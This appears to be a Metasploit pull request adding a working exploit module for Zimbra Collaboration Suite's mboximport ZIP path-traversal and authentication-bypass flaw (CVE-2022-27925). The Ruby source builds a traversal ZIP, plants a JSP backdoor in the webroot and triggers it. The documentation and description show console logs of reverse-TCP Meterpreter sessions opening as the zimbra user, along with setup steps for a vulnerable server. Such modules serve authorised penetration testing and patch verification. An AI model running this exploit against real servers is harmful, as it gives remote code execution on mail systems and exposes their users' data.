### PR TITLE
Exploit for Zimbra mboximport (CVE-2022-27925)

### DIFF
--- a/documentation/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925.md
+++ b/documentation/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925.md
@@ -67,3 +67,111 @@ The HTTPS port for Zimbra, which is used to trigger the payload (since we can't 
 ### `TARGET_USERNAME`
 
 The username included in the `mboximport` request - any valid username works, `admin` is usually fine
+
+## Scenarios
+
+### Zimbra Collaboration Suite Network Edition 8.8.12 Patch 6 on Ubuntu 18.04
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
+RHOSTS => 10.0.0.166
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > show options
+
+Module options (exploit/linux/http/zimbra_mboximport_cve_2022_27925):
+
+   Name             Current Setting                                                                   Required  Description
+   ----             ---------------                                                                   --------  -----------
+   Proxies                                                                                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS           10.0.0.166                                                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT            7071                                                                              yes       The target port (TCP)
+   RPORT_PUBLIC     443                                                                               no        The port used to trigger the payload (typically the main web port, as opposed to the admin port)
+   SSL              true                                                                              no        Negotiate SSL/TLS for outgoing connections
+   TARGET_FILENAME                                                                                    no        The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).
+   TARGET_PATH      ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/  yes       The location the payload should extract to (can, and should, contain path traversal characters - "../../").
+   TARGET_USERNAME  admin                                                                             yes       The target user, must be valid on the Zimbra server
+   VHOST                                                                                              no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.0.0.146       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Zimbra Collaboration Suite
+
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/nkxj.jsp
+[*] Sending stage (3020772 bytes) to 10.0.0.166
+[+] Successfully triggered the payload
+[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:48640) at 2022-08-22 11:08:19 -0700
+
+meterpreter > getuid
+Server username: zimbra
+
+meterpreter > shell
+Process 121849 created.
+Channel 1 created.
+/opt/zimbra/bin/zmcontrol -v
+Release 8.8.12.GA.3794.UBUNTU18.64 UBUNTU18_64 NETWORK edition, Patch 8.8.12_P6.
+```
+
+### Zimbra Collaboration Suite Network Edition 8.8.15 Patch 33 on Ubuntu 18.04
+
+Note: This version is not vulnerable, because the issue is patched
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.167
+RHOSTS => 10.0.0.167
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/gauca.jsp
+[-] Exploit aborted due to failure: unknown: Payload was not uploaded, the server probably isn't vulnerable
+[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp' on the target
+[*] Exploit completed, but no session was created.
+```
+
+### Zimbra Collaboration Suite Open Source Edition Patch 8.8.12 Patch 6 on Ubuntu 18.04
+
+Note: This version is not vulnerable, the open source edition doesn't have the correct path.
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.164
+RHOSTS => 10.0.0.164
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/cualvccyq.jsp
+[*] Sending POST request with ZIP file
+[-] Exploit aborted due to failure: not-found: The target path was not found, target is probably not vulnerable
+[*] Exploit completed, but no session was created.
+```

--- a/documentation/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925.md
+++ b/documentation/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925.md
@@ -14,7 +14,21 @@ Installing the vulnerable versions of Zimbra is a pain, unfortunately. I used a 
 which you can currently get [here](https://www.zimbra.com/downloads/zimbra-collaboration/). On the download page,
 after you register with a valid email address, there's an "older versions" link where you can get vulnerable versions.
 
-This module should be simple to use out of the box. Once the server is up, it's vulnerable.
+To set the server up:
+1. `wget https://files.zimbra.com/downloads/8.8.12_GA/zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002.tgz` on a Ubuntu 18.04 VM.
+1. `tar -xvf zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002.tgz`
+1. `hostnamectl set-hostname <hostname of your choice>` to set the hostname for the VM.
+1. Edit the `/etc/hosts` file and add in a line `127.0.0.1 <hostname of your choice>`
+1. `cd zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002 && sudo ./setup.sh`
+1. Answer `Y` to every question.
+1. You will need to wait a while whilst some stuff is set up. You should then get to a menu.
+1. Use the number keys to select the menu options.
+1. Configure the rest of the options such as the admin password, and full path to license file.
+1. Once everything is configured you should get a prompt to press `a` to save and install. Press `a` when this appears.
+1. You will then be prompted to save the configuration. Accept this and respond `Y` to any further prompts.
+1. Server should start installing. Once its finished you should be ready to test.
+
+Once the server is up, it's vulnerable.
 
 ```
 msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
@@ -70,7 +84,7 @@ The path (traversal included) where the payload will extract to. The default is 
 
 The actual filename. It really should end with `.jsp`, otherwise it won't execute.
 
-By default, it's a random string with `.jsp` on the end. That should work fine, especially 
+By default, it's a random string with `.jsp` on the end. That should work fine, especially
 because we can't overwrite files and don't want to use the same payload name more than once.
 
 ### `TARGET_USERNAME`

--- a/documentation/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925.md
+++ b/documentation/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925.md
@@ -1,17 +1,20 @@
 ## Vulnerable Application
 
-This module exploits a path-traversal vulnerability as well as an authentication-bypass vulnerability in the following versions Zimbra Collaboration Suite:
+This module exploits a path-traversal vulnerability as well as an authentication-bypass vulnerability
+in the following versions of Zimbra Collaboration Suite:
 
 * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
 * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)
 
 Note that the open source edition is not affected.
 
-Installing the vulnerable versions of Zimbra is a pain, unfortunately. I used a trial version of ZCS 8.8.12, which you can currently get [here](https://www.zimbra.com/downloads/zimbra-collaboration/). On the download page, after you register with a valid email address, there's an "older versions" link where you can get vulnerable versions.
+Successful exploitation results in RCE as the `zimbra` user.
 
-## Verification Steps
+Installing the vulnerable versions of Zimbra is a pain, unfortunately. I used a trial version of ZCS 8.8.12,
+which you can currently get [here](https://www.zimbra.com/downloads/zimbra-collaboration/). On the download page,
+after you register with a valid email address, there's an "older versions" link where you can get vulnerable versions.
 
-This module should be simple to use out of the box, once the server is up, it's vulnerable:
+This module should be simple to use out of the box. Once the server is up, it's vulnerable.
 
 ```
 msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
@@ -33,7 +36,9 @@ msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
 [*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:35180) at 2022-08-19 11:06:38 -0700
 ```
 
-There's no easy way that I see to check for the patch (and the only vulnerable version I have is quite a bit older), so the "patched" experience tries to exploit:
+There's no easy way that I see to check for the patch (and the only vulnerable version I have is
+quite a bit older), so attempts to exploit patched versions will likely result in a warning message
+that the target may not vulnerable:
 
 ```
 msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
@@ -48,6 +53,13 @@ msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
 [*] Exploit completed, but no session was created.
 ```
 
+## Verification Steps
+1. `use exploit/linux/http/zimbra_mboximport_cve_2022_27925`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set LHOST <Address of Attacking Machine>`
+1. `exploit`
+1. You should get a shell as the `zimbra` user.
+
 ## Options
 
 ### `TARGET_PATH`
@@ -58,15 +70,16 @@ The path (traversal included) where the payload will extract to. The default is 
 
 The actual filename. It really should end with `.jsp`, otherwise it won't execute.
 
-By default, it's a random string with `.jsp` on the end. That should work fine, especially because we can't overwrite files and don't want to use the same payload name more than once.
+By default, it's a random string with `.jsp` on the end. That should work fine, especially 
+because we can't overwrite files and don't want to use the same payload name more than once.
 
 ### `RPORT_PUBLIC`
 
-The HTTPS port for Zimbra, which is used to trigger the payload (since we can't seem to run JSP scripts in the zimbraAdmin root)
+The HTTPS port for Zimbra, which is used to trigger the payload (since we can't seem to run JSP scripts in the zimbraAdmin root).
 
 ### `TARGET_USERNAME`
 
-The username included in the `mboximport` request - any valid username works, `admin` is usually fine
+The username included in the `mboximport` request - any valid username works, `admin` is usually fine.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925.md
+++ b/documentation/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925.md
@@ -1,0 +1,69 @@
+## Vulnerable Application
+
+This module exploits a path-traversal vulnerability as well as an authentication-bypass vulnerability in the following versions Zimbra Collaboration Suite:
+
+* Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
+* Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)
+
+Note that the open source edition is not affected.
+
+Installing the vulnerable versions of Zimbra is a pain, unfortunately. I used a trial version of ZCS 8.8.12, which you can currently get [here](https://www.zimbra.com/downloads/zimbra-collaboration/). On the download page, after you register with a valid email address, there's an "older versions" link where you can get vulnerable versions.
+
+## Verification Steps
+
+This module should be simple to use out of the box, once the server is up, it's vulnerable:
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
+RHOSTS => 10.0.0.166
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/wuuvqmtko.jsp
+[*] Sending stage (3020772 bytes) to 10.0.0.166
+[+] Successfully triggered the payload
+[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:35180) at 2022-08-19 11:06:38 -0700
+```
+
+There's no easy way that I see to check for the patch (and the only vulnerable version I have is quite a bit older), so the "patched" experience tries to exploit:
+
+```
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/gauca.jsp
+[-] Exploit aborted due to failure: unknown: Payload was not uploaded, the server probably isn't vulnerable
+[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp' on the target
+[*] Exploit completed, but no session was created.
+```
+
+## Options
+
+### `TARGET_PATH`
+
+The path (traversal included) where the payload will extract to. The default is the webroot, which is usually pretty safe.
+
+### `TARGET_FILENAME`
+
+The actual filename. It really should end with `.jsp`, otherwise it won't execute.
+
+By default, it's a random string with `.jsp` on the end. That should work fine, especially because we can't overwrite files and don't want to use the same payload name more than once.
+
+### `RPORT_PUBLIC`
+
+The HTTPS port for Zimbra, which is used to trigger the payload (since we can't seem to run JSP scripts in the zimbraAdmin root)
+
+### `TARGET_USERNAME`
+
+The username included in the `mboximport` request - any valid username works, `admin` is usually fine

--- a/documentation/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925.md
+++ b/documentation/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925.md
@@ -73,10 +73,6 @@ The actual filename. It really should end with `.jsp`, otherwise it won't execut
 By default, it's a random string with `.jsp` on the end. That should work fine, especially 
 because we can't overwrite files and don't want to use the same payload name more than once.
 
-### `RPORT_PUBLIC`
-
-The HTTPS port for Zimbra, which is used to trigger the payload (since we can't seem to run JSP scripts in the zimbraAdmin root).
-
 ### `TARGET_USERNAME`
 
 The username included in the `mboximport` request - any valid username works, `admin` is usually fine.
@@ -101,7 +97,6 @@ Module options (exploit/linux/http/zimbra_mboximport_cve_2022_27925):
    Proxies                                                                                            no        A proxy chain of format type:host:port[,type:host:port][...]
    RHOSTS           10.0.0.166                                                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
    RPORT            7071                                                                              yes       The target port (TCP)
-   RPORT_PUBLIC     443                                                                               no        The port used to trigger the payload (typically the main web port, as opposed to the admin port)
    SSL              true                                                                              no        Negotiate SSL/TLS for outgoing connections
    TARGET_FILENAME                                                                                    no        The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).
    TARGET_PATH      ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/  yes       The location the payload should extract to (can, and should, contain path traversal characters - "../../").

--- a/modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb
+++ b/modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb
@@ -20,12 +20,12 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module POSTs a ZIP file containing path traversal characters to
           the administrator interface for Zimbra Collaboration Suite. If
-          successful, it plants a JSP-based backdoor in the public web
-          directory, then executes that backdoor.
+          successful, it plants a JSP-based backdoor within the web directory, then
+          executes it.
 
-          The core vulnerability is a path-traversal issue in their ZIP
-          implementation that can extract an arbitrary file to an arbitrary
-          location on the host.
+          The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's
+          ZIP implementation that can result in the extraction of an arbitrary file
+          to an arbitrary location on the host.
 
           This issue is exploitable on the following versions of Zimbra:
 
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2022-37042'],
           ['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'],
           ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'],
-          ['URL', 'http://www.yang99.top/index.php/archives/82/'],
+          ['URL', 'https://www.yang99.top/index.php/archives/82/'],
           ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'],
           ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'],
         ],
@@ -56,10 +56,9 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultOptions' => {
           'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
-          'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',
+          'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbraAdmin/public/',
           'TARGET_FILENAME' => nil,
           'RPORT' => 7071,
-          'RPORT_PUBLIC' => 443,
           'SSL' => true
         },
         'DefaultTarget' => 0,
@@ -77,7 +76,6 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),
         OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),
-        OptInt.new('RPORT_PUBLIC', [ false, 'The port used to trigger the payload (typically the main web port, as opposed to the admin port)']),
         OptString.new('TARGET_USERNAME', [ true, 'The target user, must be valid on the Zimbra server', 'admin']),
       ]
     )
@@ -86,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Generate an on-system filename using datastore options
   def generate_target_filename
     if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')
-      print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
+      print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
     end
 
     File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")
@@ -98,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     normalized_path = Pathname.new(File.join('/opt/zimbra/log', target_filename)).cleanpath
 
     # Figure out where it is, relative to the webroot
-    webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')
+    webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/')
     relative_path = normalized_path.relative_path_from(webroot)
 
     # Hopefully, we found a path from the webroot to the payload!
@@ -149,18 +147,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Trying to trigger the backdoor @ #{public_filename}")
 
-    # We plant this backdoor via the admin port (7071), then trigger it
-    # with the standard HTTPS port (443). The reason is, for whatever reason,
-    # JSP files planted in the admin directory don't seem to immediately
-    # be seen by Java, whereas they are in the port-443 service
+    # Trigger the backdoor
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(public_filename),
-      'rport' => datastore['RPORT_PUBLIC']
+      'uri' => normalize_uri(public_filename)
     )
 
     if res.nil?
-      fail_with(Failure::Unreachable, "Could not connect to the public port to trigger the payload (#{datastore['RPORT_PUBLIC']})")
+      fail_with(Failure::Unreachable, 'Could not connect to trigger the payload')
     elsif res.code == 200
       print_good('Successfully triggered the payload')
     elsif res.code == 404

--- a/modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb
+++ b/modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb
@@ -1,0 +1,171 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)',
+        'Description' => %q{
+          This module POSTs a ZIP file containing path traversal characters to
+          the administrator interface for Zimbra Collaboration Suite. If
+          successful, it plants a JSP-based backdoor in the public web
+          directory, then executes that backdoor.
+
+          The core vulnerability is a path-traversal issue in their ZIP
+          implementation that can extract an arbitrary file to an arbitrary
+          location on the host.
+
+          This issue is exploitable on the following versions of Zimbra:
+
+          * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
+          * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)
+
+          Note that the Open Source Edition is not affected.
+        },
+        'Author' => [
+          'Volexity Threat Research', # Initial writeup
+          "Yang_99's Nest", # PoC
+          'Ron Bowes', # Analysis / module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-27925'],
+          ['CVE', '2022-37042'],
+          ['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'],
+          ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'],
+          ['URL', 'http://www.yang99.top/index.php/archives/82/'],
+          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'],
+          ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'],
+        ],
+        'Platform' => 'linux',
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [ 'Zimbra Collaboration Suite', {} ]
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+          'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',
+          'TARGET_FILENAME' => nil,
+          'RPORT' => 7071,
+          'RPORT_PUBLIC' => 443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2022-05-10',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),
+        OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),
+        OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),
+        OptInt.new('RPORT_PUBLIC', [ false, 'The port used to trigger the payload (typically the main web port, as opposed to the admin port)']),
+        OptString.new('TARGET_USERNAME', [ true, 'The target user, must be valid on the Zimbra server', 'admin']),
+      ]
+    )
+  end
+
+  # Generate an on-system filename using datastore options
+  def generate_target_filename
+    if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')
+      print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
+    end
+
+    File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")
+  end
+
+  # Normalize the path traversal and figure out where it is relative to the web root
+  def zimbra_get_public_path(target_filename)
+    # Normalize the path
+    normalized_path = Pathname.new(File.join('/opt/zimbra/log', target_filename)).cleanpath
+
+    # Figure out where it is, relative to the webroot
+    webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')
+    relative_path = normalized_path.relative_path_from(webroot)
+
+    # Hopefully, we found a path from the webroot to the payload!
+    if relative_path.to_s.start_with?('../')
+      return nil
+    end
+
+    relative_path
+  end
+
+  def exploit
+    print_status('Encoding the payload as a .jsp file')
+    payload = Msf::Util::EXE.to_jsp(generate_payload_exe)
+
+    # Create a file
+    target_filename = generate_target_filename
+    print_status("Target filename: #{target_filename}")
+
+    # Create a zip file
+    zip = Rex::Zip::Archive.new
+    zip.add_file(target_filename, payload)
+    data = zip.pack
+
+    print_status('Sending POST request with ZIP file')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => "/service/extension/backup/mboximport?account-name=#{datastore['TARGET_USERNAME']}&ow=1&no-switch=1&append=1",
+      'data' => data
+    )
+
+    # Check the response
+    if res.nil?
+      fail_with(Failure::Unreachable, "Could not connect to the target port (#{datastore['RPORT']})")
+    elsif res.code == 404
+      fail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable')
+    elsif res.code != 401
+      print_warning("Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed")
+    end
+
+    # Get the public path for triggering the vulnerability, terminate if we
+    # can't figure it out
+    public_filename = zimbra_get_public_path(target_filename)
+    if public_filename.nil?
+      fail_with(Failure::BadConfig, 'Could not determine the public web path, maybe you need to traverse further back?')
+    end
+
+    register_file_for_cleanup(target_filename)
+
+    print_status("Trying to trigger the backdoor @ #{public_filename}")
+
+    # We plant this backdoor via the admin port (7071), then trigger it
+    # with the standard HTTPS port (443). The reason is, for whatever reason,
+    # JSP files planted in the admin directory don't seem to immediately
+    # be seen by Java, whereas they are in the port-443 service
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(public_filename),
+      'rport' => datastore['RPORT_PUBLIC']
+    )
+
+    if res.nil?
+      fail_with(Failure::Unreachable, "Could not connect to the public port to trigger the payload (#{datastore['RPORT_PUBLIC']})")
+    elsif res.code == 200
+      print_good('Successfully triggered the payload')
+    else
+      fail_with(Failure::Unknown, "Could not connect to the server to trigger the payload: #{res}")
+    end
+  end
+end

--- a/modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb
+++ b/modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb
@@ -75,7 +75,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),
         OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),
         OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),
         OptInt.new('RPORT_PUBLIC', [ false, 'The port used to trigger the payload (typically the main web port, as opposed to the admin port)']),
@@ -164,8 +163,10 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, "Could not connect to the public port to trigger the payload (#{datastore['RPORT_PUBLIC']})")
     elsif res.code == 200
       print_good('Successfully triggered the payload')
+    elsif res.code == 404
+      fail_with(Failure::Unknown, "Payload was not uploaded, the server probably isn't vulnerable")
     else
-      fail_with(Failure::Unknown, "Could not connect to the server to trigger the payload: #{res}")
+      fail_with(Failure::Unknown, "Could not connect to the server to trigger the payload: HTTP/#{res.code}")
     end
   end
 end


### PR DESCRIPTION
Add a working exploit for Zimbra mboximport (CVE-2022-27925). Web request to the admin port -> RCE.

## Verification

I tested this on Zimbra Collaboration Suite *Network* Edition (trial version) version 8.8.12 (technically, the current versions (8.8.15 and 9.0.0) are vulnerable on older patches, but I couldn't figure out how to downpatch).

```
[*] Starting persistent handler(s)...
msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
RHOSTS => 10.0.0.166
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
[*] Sending POST request with ZIP file
[*] Trying to trigger the backdoor @ public/wuuvqmtko.jsp
[*] Sending stage (3020772 bytes) to 10.0.0.166
[+] Successfully triggered the payload
[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:35180) at 2022-08-19 11:06:38 -0700

meterpreter > getuid
Server username: zimbra
```